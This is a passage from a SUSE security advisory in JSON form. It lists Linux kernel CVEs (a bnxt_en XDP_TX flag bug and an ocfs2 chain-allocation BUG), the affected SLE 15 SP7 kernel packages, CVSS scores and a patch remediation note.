"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68770",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68770"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68770",
"url": "https://www.suse.com/security/cve/CVE-2025-68770"
},
{
"category": "external",
"summary": "SUSE Bug 1256584 for CVE-2025-68770",
"url": "https://bugzilla.suse.com/1256584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68771"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
